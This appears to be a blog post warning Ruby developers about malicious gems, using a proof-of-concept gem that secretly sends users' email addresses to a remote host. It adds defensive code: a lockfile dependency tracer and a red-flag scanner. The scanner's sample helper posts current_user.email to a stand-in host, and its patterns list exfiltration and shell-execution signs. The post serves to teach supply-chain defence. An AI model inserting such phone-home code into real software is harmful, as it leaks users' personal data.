Installing a gem allows that gem’s code to run in the context of your application. Clearly this has security implications: installing a malicious gem on a server could ultimately result in that server being completely penetrated by the gem’s author. Because of this, the security of gem code is a topic of active discussion within the Ruby community. (Rubygems.org documentation)
It should be obvious to everyone that installing a gem you don’t know, have never used, or have never looked at the source code of can be a bad idea.
What could go wrong?
After installing this gem, I started thinking about how easily I believed this gem was related to the bootstrap plugin and how fast I added it to the project’s Gemfile.
What if it wasn’t doing what it is supposed to do, but was just an eye-catching name for malicious code?
Introducing - bootstrap_buttons (Please, do not install this gem)
Long story short - it will send the currently logged-in user’s email address to
http://bootstrap-buttons.herokuapp.com and then continue to generate your form as if nothing evil had happened.
How is this dangerous?
Aside from the fact that a single look at this gem will reveal its true evil identity - what happens if someone installs this gem without paying attention to it? (as in, it being a dependency of a bigger spoofed bootstrap bundle):
The add_dependency lines look fine - those are legitimate bootstrap extension gems, wrapped as Rails engines to allow easy integration into Rails apps.
bootstrap_buttons hiding in there? Seems legit, right? It will still post your users’ email addresses to the remote host, and nobody who only reads the bundle’s Gemfile line will ever notice it was installed.
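To see what a bundle like that actually drags in, here is an added example (my code, not code from the original post or from any gem it mentions) that parses a Gemfile.lock without depending on Bundler and reports every gem the application never asked for directly, together with the chain that pulled it in. The lockfile below is constructed for illustration; bootstrap_bundle, bootstrap_forms and rails_engine_helper are hypothetical gem names, and only bootstrap_buttons refers to the gem described above.

```ruby
# Added example: find gems that reached the application only as transitive
# dependencies, and show which top-level dependency "sponsored" each one.
# The lockfile is constructed; all gem names other than bootstrap_buttons are hypothetical.

CONSTRUCTED_LOCKFILE = <<~'LOCK'
  GEM
    remote: https://rubygems.org/
    specs:
      bootstrap_bundle (1.0.0)
        bootstrap_buttons (~> 0.1)
        bootstrap_forms (>= 2.0)
      bootstrap_buttons (0.1.2)
      bootstrap_forms (2.1.0)
      rails_engine_helper (0.3.0)

  PLATFORMS
    ruby

  DEPENDENCIES
    bootstrap_bundle
    rails_engine_helper
LOCK

# Parse the two sections we care about. In the GEM section a 4-space-indented
# line names a resolved gem and the 6-space lines beneath it are that gem's
# declared dependencies; DEPENDENCIES lists what the Gemfile asked for directly.
def parse_lockfile(text)
  specs = {}     # gem name => [names of its dependencies]
  direct = []    # gems requested directly by the application
  section = nil
  current = nil
  text.each_line do |raw|
    line = raw.chomp
    next if line.strip.empty?
    if line !~ /\A\s/                 # unindented line: section header (GEM, PLATFORMS, ...)
      section = line.strip
      next
    end
    case section
    when "GEM"
      if line =~ /\A {4}(\S+) \(/     # "    name (version)"
        current = $1
        specs[current] = []
      elsif line =~ /\A {6}(\S+)/ && current
        specs[current] << $1          # "      dep_name (constraint)"
      end
    when "DEPENDENCIES"
      direct << line.strip.split(/[\s(!]/).first
    end
  end
  [specs, direct]
end

# Breadth-first walk from each direct dependency, remembering the chain of
# names through which every gem was first reached.
def resolve_tree(specs, direct)
  reached = {}   # gem name => chain of gem names starting at a direct dependency
  queue = direct.map { |d| [d, [d]] }
  until queue.empty?
    name, chain = queue.shift
    next if reached.key?(name)
    reached[name] = chain
    (specs[name] || []).each { |dep| queue << [dep, chain + [dep]] }
  end
  reached
end

# Gems that are installed but that nobody listed in the Gemfile: the place a
# spoofed bundle would hide something like bootstrap_buttons.
def hidden_gems(specs, direct)
  resolve_tree(specs, direct).reject { |name, _| direct.include?(name) }
end

specs, direct = parse_lockfile(CONSTRUCTED_LOCKFILE)
hidden_gems(specs, direct).each do |name, chain|
  puts "#{name} was never requested directly; pulled in via #{chain.join(' -> ')}"
end
```

Run it against a real project's Gemfile.lock by replacing the constructed string with `File.read("Gemfile.lock")`; every name it prints is code that runs inside your application even though it appears nowhere in your Gemfile.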
What to do?
Well, just like with any of the other options suggested by the Ruby community to improve gem security and trust - there is no silver bullet. Blind trust is not a good thing unless you absolutely know what you are using and where it is coming from (a.k.a. “your own code”).
Installing open-source code into your application needs a little touch of paranoia. There is no need to go over all the code you’ll ever add to your app - but skimming through it before it lands in your Gemfile is a cheap precaution.
While skimming through a gem’s code, the following flags should raise your suspicion a bit:
- Using an HTTP interface that has nothing to do with the gem’s purpose. (You would expect an API client library to make HTTP requests - but not one that is supposed to add some neat themes.)
- Session access. Gems that read your session or the current user should be investigated more thoroughly.
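The two flags above are easy to turn into a mechanical first pass. Here is an added example (my code, not the post’s or the gem’s) that greps a gem’s Ruby files for outbound HTTP, session or current-user access, dynamic evaluation, shell execution and encoded payloads, and reports each hit with its file and line. The sample helper it scans is constructed to mirror the behaviour the post describes (post the current user’s email, then render the button); the host example.invalid and the pattern list are my choices, not anything taken from the real gem.

```ruby
# Added example: a first-pass "skim" over gem source for the red flags discussed
# above. A hit is a prompt to read that code, not a verdict; a clean run proves nothing.

RED_FLAGS = {
  "outbound HTTP from a UI gem"           => /Net::HTTP|net\/http|open-uri|OpenURI|URI\.open|HTTParty|Faraday|RestClient|TCPSocket/,
  "session / cookie / current user access" => /\bsession\[|\bcookies\[|\bcurrent_user\b|request\.env\b/,
  "dynamic code evaluation"               => /\b(?:instance_|class_|module_)?eval\b|\bObject\.const_get\b/,
  "shell execution"                       => /`[^`]+`|%x\(|\bsystem\(|\bexec\(|Open3\./,
  "encoded or hidden payload"             => /Base64\.(?:strict_|urlsafe_)?decode64|\.unpack\(|\b[0-9a-fA-F]{32,}\b/,
}

# Scan one file body line by line. Comment-only lines are skipped so that a
# comment mentioning Net::HTTP does not count. Returns an array of hit hashes.
def scan_source(path, body)
  hits = []
  body.each_line.with_index(1) do |line, no|
    next if line.lstrip.start_with?("#")
    RED_FLAGS.each do |flag, pattern|
      hits << { file: path, line: no, flag: flag, text: line.strip } if line =~ pattern
    end
  end
  hits
end

# Scan every .rb file under an unpacked gem (e.g. after `gem unpack NAME`).
def scan_gem_dir(dir)
  Dir.glob(File.join(dir, "**", "*.rb")).sort.flat_map { |f| scan_source(f, File.read(f)) }
end

# Constructed sample that mirrors what the post describes: a form helper that
# phones home with current_user.email before rendering a harmless-looking button.
CONSTRUCTED_HELPER = <<~'RUBY'
  require "net/http"

  module BootstrapButtons
    module FormHelper
      def bootstrap_button(text, options = {})
        # looks like theming, but phones home first
        Net::HTTP.post_form(URI("http://example.invalid/collect"),
                            "email" => current_user.email)
        content_tag(:button, text, class: "btn btn-primary")
      end
    end
  end
RUBY

scan_source("lib/bootstrap_buttons/form_helper.rb", CONSTRUCTED_HELPER).each do |h|
  puts "#{h[:file]}:#{h[:line]} [#{h[:flag]}] #{h[:text]}"
end
```

For a themes or buttons gem, any hit under the first two flags deserves a full read of the surrounding method; the remaining patterns catch the usual ways a gem hides what it is really doing (decoding a blob at load time, shelling out, evaluating strings).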